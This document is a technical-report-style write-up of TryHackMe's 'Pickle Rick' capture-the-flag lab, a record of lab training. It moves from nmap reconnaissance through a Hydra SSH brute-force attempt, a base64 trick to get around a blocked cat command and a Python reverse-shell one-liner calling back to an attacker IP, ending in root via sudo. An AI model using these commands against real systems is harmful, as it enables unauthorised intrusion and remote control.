Technical Report

Detailed analysis for technical teams, covering methodologies, tools, and findings.

Technical Security Report: "Pickle Rick" System

Purpose of the Report

This report documents a simulated security assessment conducted on the "Pickle Rick" system from TryHackMe. The objective was to identify and exploit vulnerabilities, demonstrate potential attack paths, and highlight key areas for security improvement.

Methodology

The assessment was executed using a structured approach:

Reconnaissance: Identifying open ports and services via Nmap.
Enumeration: Analyzing web pages and source code to gather user credentials and hidden information.
Exploitation: Leveraging brute-force techniques, directory enumeration, and command execution to gain further access.
Privilege Escalation: Establishing a reverse shell and escalating privileges to achieve root access.

Detailed Findings

1. Initial Reconnaissance

Tool Used: Nmap
Command Executed:
```
sudo nmap -F -T5 -sCV <target_ip>
```
Results: Two open ports were identified:
- Port 80: HTTP service.
- Port 22: SSH service.
Impact: The discovery of these ports set the foundation for further targeted testing.

2. Web Service Analysis

Procedure:
- Visited http://<target_ip>:80, revealing a message from Rick requesting help due to a forgotten password.
- Examined the page source (via Ctrl+U or using curl http://<target_ip>) which exposed the username R1ckRul3s.
Impact: The extraction of the username provided a critical credential for subsequent authentication attempts.

3. SSH Brute-Force Attempt

Tool Used: Hydra

Command Executed:

hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<target_ip>

Results: The SSH service did not support password authentication.
Impact: This method was abandoned in favor of web-based enumeration.

Tool Used: Dirbuster
Procedure:
- Ran Dirbuster to enumerate directories on the HTTP service.
- Discovered that accessing /portal.php redirected to login.php, an administrative login page.
Authentication Attempts:
- Tried common passwords (e.g., Password123, admin, root) with no success.
- Reviewed the robots.txt file, which revealed a potential password.
- Result: The discovered password allowed successful login to the admin panel.
Impact: Gaining access to the admin interface provided an in-browser terminal for command execution.

5. Command Execution and File Discovery

Procedure:
- Executed commands (whoami, ls -la) via the admin terminal.
- Identified a file named Sup3rS3cretPickl3Ingred.txt.
- The cat command was blocked; instead, the file was read using:
  base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode
Results: Successfully retrieved the contents (first secret ingredient).
Impact: Obtaining the first ingredient validated the ability to execute system commands.

6. Establishing a Reverse Shell

Preparation:
- Verified Python 3 availability with python3 --version.
- Employed the reverse shell script from Pentestmonkey.

Commands Executed:

On the Attacker Machine:
```
nc -lnvp 8888
```

On the Target (via the admin terminal):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Result: An interactive reverse shell was established.
Impact: The reverse shell provided a robust foothold, facilitating deeper system exploration.

7. Privilege Escalation to Root

Procedure:
- Tested for sudo access; executing:
  sudo /bin/bash
Result: Obtained root-level access.
Impact: Full system control was achieved, allowing unrestricted enumeration and file access.

8. Final Enumeration and Retrieval of Remaining Ingredients

Procedure:
- Enumerated the root home directory to locate additional secret ingredients.
- Read the file 3rd.txt to retrieve another ingredient.
- Inspected /home to identify the rick user's directory, which contained the final secret ingredient.
Impact: All required ingredients were successfully retrieved, completing the challenge.

Conclusion

The assessment of the "Pickle Rick" system showcased a methodical exploitation process—from initial reconnaissance and web-based enumeration to reverse shell establishment and privilege escalation. The successful extraction of all secret ingredients highlights vulnerabilities such as exposed administrative interfaces, weak authentication, and inadequate command restrictions. This exercise underscores the importance of robust service configurations, strong authentication practices, and continuous security monitoring to mitigate potential risks.

PreviousWrite-up NextExecutive Report

Last updated 10 months ago

hashtagTechnical Security Report: "Pickle Rick" System

hashtagPurpose of the Report

hashtagMethodology

hashtagDetailed Findings

hashtag1. Initial Reconnaissance

hashtag2. Web Service Analysis

hashtag3. SSH Brute-Force Attempt

hashtag4. Directory Enumeration and Admin Login

hashtag5. Command Execution and File Discovery

hashtag6. Establishing a Reverse Shell

hashtag7. Privilege Escalation to Root

hashtag8. Final Enumeration and Retrieval of Remaining Ingredients

hashtagConclusion